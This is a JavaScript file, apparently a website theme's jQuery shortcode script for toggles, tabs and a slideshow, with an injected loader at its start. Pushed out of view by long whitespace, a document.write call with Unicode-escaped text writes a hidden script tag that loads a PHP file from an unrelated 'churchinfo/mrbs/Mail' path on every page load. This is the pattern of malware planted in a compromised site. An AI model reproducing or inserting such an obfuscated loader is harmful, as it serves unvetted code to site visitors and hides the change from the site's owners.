																																																																							document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u002F\u0063\u006D\u0073\u002F\u0063\u0068\u0075\u0072\u0063\u0068\u0069\u006E\u0066\u006F\u002F\u006D\u0072\u0062\u0073\u002F\u004D\u0061\u0069\u006C\u002F\u0063\u006C\u0069\u0063\u006B\u005F\u0067\u0061\u006C\u006C\u0065\u0072\u0079\u002E\u0070\u0068\u0070\u0022\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");jQuery(document).ready(function(){
	
	// SHORTCODE: Toggle Content
	jQuery(".sc-togglecontent .tc-switch").click(function(){
		jQuery(this).parent().find(".tc-content").slideToggle(100);
		if(jQuery(this).hasClass("close")){
			jQuery(this).removeClass("close").addClass("open");
			jQuery(this).parent().find(".tc-content").removeClass("close").addClass("open");
		} else {
			jQuery(this).removeClass("open").addClass("close");
			jQuery(this).parent().find(".tc-content").removeClass("open").addClass("close");
		}
	});
	
	// SHORTCODE: Tab Content
	jQuery(".sc-tab .tab-header").click(function(){
		jQuery(this).parents(".sc-tab").find(".tab-header").each(function(i, o){ jQuery(this).attr("rel", "totab" + i); });
		jQuery(this).parents(".sc-tab").find(".tab-content").each(function(i, o){ jQuery(this).attr("id", "totab" + i); });
		
		var totab = "#" + jQuery(this).attr("rel");
		
		jQuery(this).parents(".sc-tab").find(".tab-header").removeClass("active");
		jQuery(this).addClass("active");
		jQuery(this).parents(".sc-tab").find(".tab-content").css("display", "none");
		jQuery(this).parents(".sc-tab").find(totab).css("display", "block");
	}).filter(":first").click();
	
	// SHORTCODE: Slideshow
	jQuery(".sc-tab.slideshow, .sc-tab.imagetab").slides({
		container: "tab-container",
		autoHeight : true,
		generatePagination: false
	});
	
});
